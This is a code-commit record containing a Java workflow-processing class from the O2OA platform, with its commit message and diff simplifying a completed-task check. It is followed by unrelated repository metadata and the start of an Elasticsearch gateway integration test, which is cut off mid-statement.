aeiObjects.getJoinInquireTaskCompleteds()) { if (StringUtils.equals(o.getActivityToken(), workLog.getArrivedActivityToken())) { List<String> values = ListUtils.intersection(identities, aeiObjects.business().organization().identity().listWithPerson(o.getPerson())); if (!values.isEmpty()) { TaskCompleted obj = new TaskCompleted(aeiObjects.getWork(), route, o); obj.setIdentity(values.get(0)); obj.setUnit(aeiObjects.business().organization().unit().getWithIdentity(obj.getIdentity())); obj.setProcessingType(TaskCompleted.PROCESSINGTYPE_SAMETARGET); obj.setRouteName(route.getName()); Date now = new Date(); obj.setStartTime(now); obj.setStartTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setCompletedTime(now); obj.setCompletedTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setDuration(0L); obj.setExpired(false); obj.setExpireTime(null); obj.setTask(null); obj.setLatest(true); aeiObjects.getCreateTaskCompleteds().add(obj); } } } } } // 计算处理人 private List<String> calculateTaskIdentities(AeiObjects aeiObjects, Manual manual) throws Exception { TaskIdentities taskIdentities = new 
TaskIdentities(); // 先计算强制处理人 if (!aeiObjects.getWork().getProperties().getManualForceTaskIdentityList().isEmpty()) { List<String> identities = new ArrayList<>(); identities.addAll(aeiObjects.getWork().getProperties().getManualForceTaskIdentityList()); identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } // 计算退回的结果 if (taskIdentities.isEmpty()) { Route route = aeiObjects.business().element().get(aeiObjects.getWork().getDestinationRoute(), Route.class); if ((null != route) && (StringUtils.equals(route.getType(), Route.TYPE_BACK))) { List<String> identities = new ArrayList<>(); List<WorkLog> workLogs = new ArrayList<>(); workLogs.addAll(aeiObjects.getUpdateWorkLogs()); workLogs.addAll(aeiObjects.getCreateWorkLogs()); for (WorkLog o : aeiObjects.getWorkLogs()) { if (!workLogs.contains(o)) { workLogs.add(o); } } WorkLogTree tree = new WorkLogTree(workLogs); Node node = tree.location(aeiObjects.getWork()); if (null != node) { for (Node n : tree.up(node)) { if (StringUtils.equals(manual.getId(), n.getWorkLog().getFromActivity())) { for (TaskCompleted t : aeiObjects.getTaskCompleteds()) { if (StringUtils.equals(n.getWorkLog().getFromActivityToken(), t.getActivityToken()) && BooleanUtils.isTrue(t.getJoinInquire())) { identities.add(t.getIdentity()); } } break; } } identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } } } if (taskIdentities.isEmpty()) { taskIdentities = TranslateTaskIdentityTools.translate(aeiObjects, manual); this.ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(aeiObjects, manual, taskIdentities); this.writeToEmpowerMap(aeiObjects, taskIdentities); } return taskIdentities.identities(); } // 如果活动没有找到任何可用的处理人,那么强制设置处理人为文档创建者,或者配置的 maintenanceIdentity private void ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(AeiObjects aeiObjects, Manual manual, TaskIdentities taskIdentities) throws Exception { if (taskIdentities.isEmpty()) { String identity = aeiObjects.business().organization().identity() .get(aeiObjects.getWork().getCreatorIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 标题:{}, id:{}, 强制指定处理人为活动的创建身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { identity = aeiObjects.business().organization().identity() .get(Config.processPlatform().getMaintenanceIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 也没有能找到工作创建人, 标题:{}, id:{}, 强制指定处理人为系统维护身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), aeiObjects.getActivity().getName(), aeiObjects.getActivity().getId()); } } } } // 更新授权,通过surface创建且workThroughManual=false 代表是草稿,那么不需要授权. 
private void writeToEmpowerMap(AeiObjects aeiObjects, TaskIdentities taskIdentities) throws Exception { // 先清空EmpowerMap aeiObjects.getWork().getProperties().setManualEmpowerMap(new LinkedHashMap<String, String>()); if (!(StringUtils.equals(aeiObjects.getWork().getWorkCreateType(), Work.WORKCREATETYPE_SURFACE) && BooleanUtils.isFalse(aeiObjects.getWork().getWorkThroughManual()))) { List<String> values = taskIdentities.identities(); values = ListUtils.subtract(values, aeiObjects.getProcessingAttributes().getIgnoreEmpowerIdentityList()); taskIdentities.empower(aeiObjects.business().organization().empower().listWithIdentityObject( aeiObjects.getWork().getApplication(), aeiObjects.getProcess().getEdition(), aeiObjects.getWork().getProcess(), aeiObjects.getWork().getId(), values)); for (TaskIdentity taskIdentity : taskIdentities) { if (StringUtils.isNotEmpty(taskIdentity.getFromIdentity())) { aeiObjects.getWork().getProperties().getManualEmpowerMap().put(taskIdentity.getIdentity(), taskIdentity.getFromIdentity()); } } } } private WorkLog findPassSameTargetWorkLog(AeiObjects aeiObjects) throws Exception { WorkLogTree tree = new WorkLogTree(aeiObjects.getWorkLogs()); List<WorkLog> parents = tree.parents(aeiObjects.getArriveWorkLog(aeiObjects.getWork())); logger.debug("pass same target rollback parents:{}.", parents); WorkLog workLog = null; for (WorkLog o : parents) { if (Objects.equals(ActivityType.manual, o.getArrivedActivityType())) { workLog = o; break; } else if (Objects.equals(ActivityType.choice, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.agent, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.invoke, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.service, o.getArrivedActivityType())) { continue; } else { break; } } logger.debug("pass same target find workLog:{}.", workLog); return workLog; } @Override protected void arrivingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Work> executing(AeiObjects aeiObjects, Manual manual) throws Exception { List<Work> results = new ArrayList<>(); boolean passThrough = false; List<String> identities = aeiObjects.business().organization().identity() .list(aeiObjects.getWork().getManualTaskIdentityList()); // 找到在当前环节已经处理过的已办 List<TaskCompleted> taskCompleteds = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .collect(Collectors.toList()); // 去掉已经处理过的身份 identities = ListUtils.subtract(identities, ListTools.extractProperty(taskCompleteds, TaskCompleted.identity_FIELDNAME, String.class, true, true)); identities = aeiObjects.business().organization().identity().list(identities); // 现在处理人为空且没有参与流转的已办 if (identities.isEmpty() && taskCompleteds.isEmpty()) { identities = calculateTaskIdentities(aeiObjects, manual); logger.info("工作设置的处理人已经全部无效,重新计算当前环节所有处理人进行处理,标题:{}, id:{}, 设置的处理人:{}.", aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identities); // 后面进行了identitis.remove()这里必须用一个新对象包装 aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); } // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualExecute(aeiObjects.getWork().getActivityToken(), manual, Objects.toString(manual.getManualMode(), ""), identities)); switch (manual.getManualMode()) { case single: passThrough = this.single(aeiObjects, manual, identities); break; case parallel: passThrough = 
this.parallel(aeiObjects, manual, identities); break; case queue: passThrough = this.queue(aeiObjects, manual, identities); break; case grab: passThrough = this.single(aeiObjects, manual, identities); break; default: throw new ExceptionManualModeError(manual.getId()); } if (passThrough) { results.add(aeiObjects.getWork()); } return results; } @Override protected void executingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Route> inquiring(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes() .push(Signal.manualInquire(aeiObjects.getWork().getActivityToken(), manual)); List<Route> results = new ArrayList<>(); // 仅有单条路由 if (aeiObjects.getRoutes().size() == 1) { results.add(aeiObjects.getRoutes().get(0)); } else if (aeiObjects.getRoutes().size() > 1) { // 存在多条路由 List<TaskCompleted> taskCompletedList = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(o.getActivityToken(), aeiObjects.getWork().getActivityToken()) && aeiObjects.getWork().getManualTaskIdentityList().contains(o.getIdentity())) .collect(Collectors.toList()); String name = this.choiceRouteName(taskCompletedList, aeiObjects.getRoutes()); for (Route o : aeiObjects.getRoutes()) { if (o.getName().equalsIgnoreCase(name)) { results.add(o); break; } } } if (!results.isEmpty()) { // 清理掉强制的指定的处理人 aeiObjects.getWork().getProperties().setManualForceTaskIdentityList(new ArrayList<String>()); } return results; } // 通过已办存根选择某条路由 private String choiceRouteName(List<TaskCompleted> list, List<Route> routes) throws Exception { String result = ""; List<String> names = new ArrayList<>(); ListTools.trim(list, false, false).stream().forEach(o -> names.add(o.getRouteName())); // 进行优先路由的判断 Route soleRoute = routes.stream().filter(o -> BooleanUtils.isTrue(o.getSole())).findFirst().orElse(null); if ((null != soleRoute) && names.contains(soleRoute.getName())) { result = soleRoute.getName(); } else { // 进行默认的策略,选择占比多的 result = maxCountOrLatest(list); } if (StringUtils.isEmpty(result)) { throw new ExceptionChoiceRouteNameError( ListTools.extractProperty(list, JpaObject.id_FIELDNAME, String.class, false, false)); } return result; } private String maxCountOrLatest(List<TaskCompleted> list) { Map<String, List<TaskCompleted>> map = list.stream() .collect(Collectors.groupingBy(TaskCompleted::getRouteName)); Optional<Entry<String, List<TaskCompleted>>> optional = map.entrySet().stream().sorted((o1, o2) -> { int c = o2.getValue().size() - o1.getValue().size(); if (c == 0) { Date d1 = o1.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); Date d2 = o2.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); return ObjectUtils.compare(d2, d1); } else { return c; } }).findFirst(); return optional.isPresent() ? 
optional.get().getKey() : null; } private boolean single(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; Long count = aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (identities.contains(o.getIdentity()))) { return true; } else { return false; } }).count(); if (count > 0) { // 已经确定要通过此节点,清除可能是多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getId(), o.getWork()); }).forEach(o -> { // 如果启用了将未处理待办转待阅,那么进行转换 if (BooleanUtils.isTrue(manual.getManualUncompletedTaskToRead())) { aeiObjects.getCreateReads() .add(new Read(aeiObjects.getWork(), o.getIdentity(), o.getUnit(), o.getPerson())); } aeiObjects.deleteTask(o); }); // 所有预计的处理人中已经有已办,这个环节已经产生了已办,可以离开换个环节。 passThrough = true; } else { // 取到期望的待办人员,由于要进行处理需要转换成可读写List if (ListTools.isEmpty(identities)) { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), manual.getName(), manual.getId()); } // 删除多余的待办 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity()))) .forEach(aeiObjects::deleteTask); // 将待办已经产生的人从预期值中删除 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (ListTools.contains(identities, o.getIdentity()))) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } private boolean parallel(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; // 取得本环节已经处理的已办 List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由,如果有人选择了优先路由那么直接流转.需要判断是否启用了soleDirect Route soleRoute = aeiObjects.getRoutes().stream() .filter(r -> BooleanUtils.isTrue(r.getSole()) && BooleanUtils.isTrue(r.getSoleDirect())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { this.parallelSoleTaskCompleted(aeiObjects); return true; } } // 将已经处理的人从期望值中移除 aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(o -> identities.remove(o.getIdentity())); // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity())); }).forEach(aeiObjects::deleteTask); if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; // 先清空已经有待办的身份 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } // 并行环节下如果有优先路由,那么直接走优先路由,处理的时候需要晴空所有代办 private void 
parallelSoleTaskCompleted(AeiObjects aeiObjects) throws Exception { // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(aeiObjects::deleteTask); } private boolean queue(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由 Route soleRoute = aeiObjects.getRoutes().stream().filter(r -> BooleanUtils.isTrue(r.getSole())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { return true; } } // 存在优先路由结束 // 将已经处理的人从期望值中移除 for (TaskCompleted o : taskCompleteds) { identities.remove(o.getIdentity()); } if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; String identity = identities.get(0); // 还有人没有处理,开始判断待办,取到本环节的所有待办,理论上只能有一条待办 boolean find = false; for (Task t : aeiObjects.getTasks()) { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), t.getActivityToken())) { if (!StringUtils.equals(t.getIdentity(), identity)) { aeiObjects.deleteTask(t); } else { find = true; } } } // 当前处理人没有待办 if (!find) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } return passThrough; } // 所有有效的已办,去除 reset,retract,appendTask private List<TaskCompleted> listJoinInquireTaskCompleted(AeiObjects aeiObjects, List<String> identities) throws Exception { return aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && identities.contains(o.getIdentity()) && BooleanUtils.isTrue(o.getJoinInquire())) .collect(Collectors.toList()); } @Override protected void inquiringCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } private void calculateExpire(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { if (null != manual.getTaskExpireType()) { switch (manual.getTaskExpireType()) { case never: this.expireNever(task); break; case appoint: this.expireAppoint(manual, task); break; case script: this.expireScript(aeiObjects, manual, task); break; default: break; } } // 如果work有截至时间 if (null != aeiObjects.getWork().getExpireTime()) { if (null == task.getExpireTime()) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } else { if (task.getExpireTime().after(aeiObjects.getWork().getExpireTime())) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } } } // 已经有过期时间了,那么设置催办时间 if (null != task.getExpireTime()) { task.setUrgeTime(DateUtils.addHours(task.getExpireTime(), -2)); } else { task.setExpired(false); task.setUrgeTime(null); task.setUrged(false); } } // 从不过期 private void expireNever(Task task) { task.setExpireTime(null); } private void expireAppoint(Manual manual, Task task) throws Exception { if (BooleanUtils.isTrue(manual.getTaskExpireWorkTime())) { this.expireAppointWorkTime(task, manual); } else { this.expireAppointNaturalDay(task, manual); } } private void expireAppointWorkTime(Task task, Manual manual) throws Exception { Integer m = 0; WorkTime wt = new WorkTime(); if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * wt.minutesOfWorkDay(); } if 
(BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Date expire = wt.forwardMinutes(new Date(), m); task.setExpireTime(expire); } else { task.setExpireTime(null); } } private void expireAppointNaturalDay(Task task, Manual manual) throws Exception { Integer m = 0; if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * 60 * 24; } if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } private void expireScript(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { ExpireScriptResult expire = new ExpireScriptResult(); ScriptContext scriptContext = aeiObjects.scriptContext(); Bindings bindings = scriptContext.getBindings(ScriptContext.ENGINE_SCOPE); bindings.put(ScriptFactory.BINDING_NAME_TASK, task); bindings.put(ScriptFactory.BINDING_NAME_EXPIRE, expire); // 重新注入对象需要重新运行 ScriptFactory.initialScriptText().eval(scriptContext); aeiObjects.business().element() .getCompiledScript(aeiObjects.getWork().getApplication(), manual, Business.EVENT_MANUALTASKEXPIRE) .eval(scriptContext); if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getWorkHour(), 0))) { Integer m = 0; m += expire.getWorkHour() * 60; if (m > 0) { WorkTime wt = new WorkTime(); task.setExpireTime(wt.forwardMinutes(new Date(), m)); } else { task.setExpireTime(null); } } else if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getHour(), 0))) { Integer m = 0; m += expire.getHour() * 60; if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } else if (null != expire.getDate()) { task.setExpireTime(expire.getDate()); } else { task.setExpireTime(null); } } private Task createTask(AeiObjects aeiObjects, Manual manual, String identity) throws Exception { String fromIdentity = aeiObjects.getWork().getProperties().getManualEmpowerMap().get(identity); String person = aeiObjects.business().organization().person().getWithIdentity(identity); String unit = aeiObjects.business().organization().unit().getWithIdentity(identity); Task task = new Task(aeiObjects.getWork(), identity, person, unit, fromIdentity, new Date(), null, aeiObjects.getRoutes(), manual.getAllowRapid()); // 是第一条待办,进行标记 task.setFirst(ListTools.isEmpty(aeiObjects.getJoinInquireTaskCompleteds())); this.calculateExpire(aeiObjects, manual, task); if (StringUtils.isNotEmpty(fromIdentity)) { aeiObjects.business().organization().empowerLog() .log(this.createEmpowerLog(aeiObjects.getWork(), fromIdentity, identity)); String fromPerson = aeiObjects.business().organization().person().getWithIdentity(fromIdentity); String fromUnit = aeiObjects.business().organization().unit().getWithIdentity(fromIdentity); TaskCompleted empowerTaskCompleted = new TaskCompleted(aeiObjects.getWork()); empowerTaskCompleted.setProcessingType(TaskCompleted.PROCESSINGTYPE_EMPOWER); empowerTaskCompleted.setIdentity(fromIdentity); empowerTaskCompleted.setUnit(fromUnit); empowerTaskCompleted.setPerson(fromPerson); empowerTaskCompleted.setEmpowerToIdentity(identity); aeiObjects.createTaskCompleted(empowerTaskCompleted); Read empowerRead = new Read(aeiObjects.getWork(), fromIdentity, fromUnit, fromPerson); aeiObjects.createRead(empowerRead); } return 
task; } private EmpowerLog createEmpowerLog(Work work, String fromIdentity, String toIdentity) { return new EmpowerLog().setApplication(work.getApplication()).setApplicationAlias(work.getApplicationAlias()) .setApplicationName(work.getApplicationName()).setProcess(work.getProcess()) .setProcessAlias(work.getProcessAlias()).setProcessName(work.getProcessName()).setTitle(work.getTitle()) .setWork(work.getId()).setJob(work.getJob()).setFromIdentity(fromIdentity).setToIdentity(toIdentity) .setActivity(work.getActivity()).setActivityAlias(work.getActivityAlias()) .setActivityName(work.getActivityName()).setEmpowerTime(new Date()); } private List<String> arriving_sameJobActivityExistIdentities(AeiObjects aeiObjects, Manual manual) throws Exception { List<String> exists = new ArrayList<>(); aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(o.getActivity(), manual.getId()) && StringUtils.equals(o.getJob(), aeiObjects.getWork().getJob()); }).forEach(o -> exists.add(o.getIdentity())); return exists; } public class ExpireScriptResult { Integer hour; Integer workHour; Date date; public Integer getHour() { return hour; } public void setHour(Integer hour) { this.hour = hour; } public Integer getWorkHour() { return workHour; } public void setWorkHour(Integer workHour) { this.workHour = workHour; } public Date getDate() { return date; } public void setDate(Date date) { this.date = date; } public void setDate(String str) { try { this.date = DateTools.parse(str); } catch (Exception e) { logger.error(e); } } } }
Fix the check on completed tasks
o2server/x_processplatform_service_processing/src/main/java/com/x/processplatform/service/processing/processor/manual/ManualProcessor.java
Fix the check on completed tasks
<ide><path>o2server/x_processplatform_service_processing/src/main/java/com/x/processplatform/service/processing/processor/manual/ManualProcessor.java <ide> protected List<Work> executing(AeiObjects aeiObjects, Manual manual) throws Exception { <ide> List<Work> results = new ArrayList<>(); <ide> boolean passThrough = false; <del> List<String> identities = aeiObjects.business().organization().identity() <del> .list(aeiObjects.getWork().getManualTaskIdentityList()); <ide> // 找到在当前环节已经处理过的已办 <ide> List<TaskCompleted> taskCompleteds = aeiObjects.getJoinInquireTaskCompleteds().stream() <ide> .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) <ide> .collect(Collectors.toList()); <ide> // 去掉已经处理过的身份 <del> identities = ListUtils.subtract(identities, <add> List<String> identities = ListUtils.subtract(aeiObjects.getWork().getManualTaskIdentityList(), <ide> ListTools.extractProperty(taskCompleteds, TaskCompleted.identity_FIELDNAME, String.class, true, true)); <ide> identities = aeiObjects.business().organization().identity().list(identities); <ide> // 现在处理人为空且没有参与流转的已办
Java
apache-2.0
7bb676ad4f94a1b92c1968012534cf5c925dabcd
0
robin13/elasticsearch,GlenRSmith/elasticsearch,nknize/elasticsearch,robin13/elasticsearch,GlenRSmith/elasticsearch,robin13/elasticsearch,GlenRSmith/elasticsearch,robin13/elasticsearch,nknize/elasticsearch,nknize/elasticsearch,robin13/elasticsearch,GlenRSmith/elasticsearch,GlenRSmith/elasticsearch,nknize/elasticsearch,nknize/elasticsearch
/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.gateway; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; import org.elasticsearch.action.admin.cluster.state.ClusterStateResponse; import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.support.ActiveShardCount; import org.elasticsearch.client.Client; import org.elasticsearch.client.Requests; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.coordination.CoordinationMetadata; import org.elasticsearch.cluster.metadata.IndexGraveyard; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.MappingMetadata; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.routing.IndexRoutingTable; import org.elasticsearch.cluster.routing.IndexShardRoutingTable; import org.elasticsearch.cluster.routing.RoutingTable; import org.elasticsearch.cluster.routing.ShardRoutingState; import org.elasticsearch.cluster.routing.UnassignedInfo; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.CheckedConsumer; import org.elasticsearch.common.Priority; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.xcontent.XContentFactory; import org.elasticsearch.core.internal.io.IOUtils; import org.elasticsearch.env.NodeEnvironment; import org.elasticsearch.env.NodeMetadata; import org.elasticsearch.index.mapper.MapperParsingException; import org.elasticsearch.indices.IndexClosedException; import org.elasticsearch.indices.ShardLimitValidator; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.ESIntegTestCase.ClusterScope; import org.elasticsearch.test.ESIntegTestCase.Scope; import org.elasticsearch.test.InternalTestCluster.RestartCallback; import java.io.IOException; import java.nio.file.Path; import java.util.List; import java.util.Map; import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static org.elasticsearch.action.support.WriteRequest.RefreshPolicy.IMMEDIATE; import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; import static org.elasticsearch.test.NodeRoles.nonDataNode; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertHitCount; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static 
org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.notNullValue; @ClusterScope(scope = Scope.TEST, numDataNodes = 0) public class GatewayIndexStateIT extends ESIntegTestCase { private final Logger logger = LogManager.getLogger(GatewayIndexStateIT.class); @Override protected boolean addMockInternalEngine() { // testRecoverBrokenIndexMetadata replies on the flushing on shutdown behavior which can be randomly disabled in MockInternalEngine. return false; } public void testMappingMetadataParsed() throws Exception { logger.info("--> starting 1 nodes"); internalCluster().startNode(); logger.info("--> creating test index, with meta routing"); client().admin().indices().prepareCreate("test") .setMapping(XContentFactory.jsonBuilder().startObject().startObject("_doc").startObject("_routing") .field("required", true).endObject().endObject().endObject()) .execute().actionGet(); logger.info("--> verify meta _routing required exists"); MappingMetadata mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata() .index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for yellow status"); ensureYellow(); logger.info("--> verify meta _routing required exists"); mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata().index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); } public void testSimpleOpenClose() throws Exception { logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> creating test index"); createIndex("test"); NumShards test = getNumShards("test"); logger.info("--> waiting for green status"); ensureGreen(); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").get(); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch (IndexClosedException e) { // all is well } logger.info("--> creating another index (test2) by indexing into it"); client().prepareIndex("test2").setId("1").setSource("field1", "value1").execute().actionGet(); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> opening the first index again..."); assertAcked(client().admin().indices().prepareOpen("test")); logger.info("--> verifying that the state is green"); ensureGreen(); stateResponse = 
client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first index"); GetResponse getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for two nodes and green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch 